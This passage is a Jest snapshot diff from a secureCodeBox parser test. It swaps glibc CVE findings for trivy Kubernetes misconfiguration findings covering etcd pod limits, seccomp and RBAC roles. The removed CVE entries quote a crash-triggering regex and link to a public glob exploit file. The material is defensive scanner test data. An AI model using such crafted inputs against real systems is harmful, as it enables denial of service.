overflow/underflow in getcwd()", + "category": "Misconfiguration", + "description": "Enforcing memory limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", + "name": "Memory not limited(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'resources.limits.memory')", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3999", - }, - { - "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3999", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "value": "https://avd.aquasec.com/misconfig/ksv018", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV023", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv023", + ], + }, + "category": "Misconfiguration", + "description": "HostPath volumes must be forbidden.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Do not set 'spec.volumes[*].hostPath'.", + "name": "hostPath volumes mounted(Pod 'etcd-kind-control-plane' should not set 'spec.template.volumes.hostPath')", + "references": [ { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "value": "https://avd.aquasec.com/misconfig/ksv023", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:controller:cronjob-controller' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:cronjob-controller", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], "severity": "HIGH", @@ -115961,8835 +116147,10403 @@ exports[`should parse a trivy-k8s scan result of a cluster running secureCodeBox { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2010-4756", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "foundIn": "Target: 'ClusterRole/system:controller:cronjob-controller' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://cxib.net/stuff/glob-0day.c", - "http://securityreason.com/achievement_securityalert/89", - "http://securityreason.com/exploitalert/9223", - "https://access.redhat.com/security/cve/CVE-2010-4756", - "https://bugzilla.redhat.com/show_bug.cgi?id=681681", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", - "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", - "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", ], }, - "category": "Vulnerability", - "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:cronjob-controller", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2010-4756", - }, - { - "type": "URL", - "value": "http://cxib.net/stuff/glob-0day.c", - }, - { - "type": "URL", - "value": "http://securityreason.com/achievement_securityalert/89", - }, - { - "type": "URL", - "value": "http://securityreason.com/exploitalert/9223", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2010-4756", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:controller:deployment-controller' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:deployment-controller", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:controller:deployment-controller' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:deployment-controller", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-20796", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "foundIn": "Target: 'ClusterRole/system:controller:endpoint-controller' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://www.securityfocus.com/bid/107160", - "https://access.redhat.com/security/cve/CVE-2018-20796", - "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", - "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", - "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", - "https://security.netapp.com/advisory/ntap-20190315-0002/", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", ], }, - "category": "Vulnerability", - "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:endpoint-controller", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'system:controller:endpoint-controller' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-20796", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/107160", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-20796", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:controller:endpointslice-controller' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:endpointslice-controller", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'system:controller:endpointslice-controller' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:controller:endpointslicemirroring-controller' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:endpointslicemirroring-controller", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'system:controller:endpointslicemirroring-controller' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:controller:generic-garbage-collector' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV046", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv046", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits specific verb on wildcard resources", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:generic-garbage-collector", + "mitigation": "Create a role which does not permit specific verb on wildcard resources", + "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", + "references": [ { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://avd.aquasec.com/misconfig/ksv046", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010022", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "foundIn": "Target: 'ClusterRole/system:controller:expand-controller' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010022", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", - "https://security-tracker.debian.org/tracker/CVE-2019-1010022", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", - "https://ubuntu.com/security/CVE-2019-1010022", - "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", ], }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: stack guard protection bypass", + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:expand-controller", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:controller:horizontal-pod-autoscaler' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV046", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv046", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits specific verb on wildcard resources", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:horizontal-pod-autoscaler", + "mitigation": "Create a role which does not permit specific verb on wildcard resources", + "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "value": "https://avd.aquasec.com/misconfig/ksv046", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:controller:job-controller' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:job-controller", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:controller:namespace-controller' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV046", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv046", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits specific verb on wildcard resources", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:namespace-controller", + "mitigation": "Create a role which does not permit specific verb on wildcard resources", + "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010022", + "value": "https://avd.aquasec.com/misconfig/ksv046", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010023", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "foundIn": "Target: 'ClusterRole/system:controller:persistent-volume-binder' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV041", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://www.securityfocus.com/bid/109167", - "https://access.redhat.com/security/cve/CVE-2019-1010023", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", - "https://security-tracker.debian.org/tracker/CVE-2019-1010023", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", - "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010023", - "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv041", ], }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", + "category": "Misconfiguration", + "description": "Check whether role permits managing secrets", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:persistent-volume-binder", + "mitigation": "Create a role which does not permit to manage secrets if not needed", + "name": "Do not allow management of secrets(Role permits management of secret(s))", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/109167", + "value": "https://avd.aquasec.com/misconfig/ksv041", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:controller:persistent-volume-binder' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:persistent-volume-binder", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'system:controller:persistent-volume-binder' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:controller:persistent-volume-binder' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:persistent-volume-binder", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'system:controller:persistent-volume-binder' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:controller:replicaset-controller' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:replicaset-controller", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010023", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010024", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "foundIn": "Target: 'ClusterRole/system:controller:replication-controller' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://www.securityfocus.com/bid/109162", - "https://access.redhat.com/security/cve/CVE-2019-1010024", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", - "https://security-tracker.debian.org/tracker/CVE-2019-1010024", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010024", - "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", ], }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: ASLR bypass using cache of thread stack and heap", + "category": "Misconfiguration", + "description": 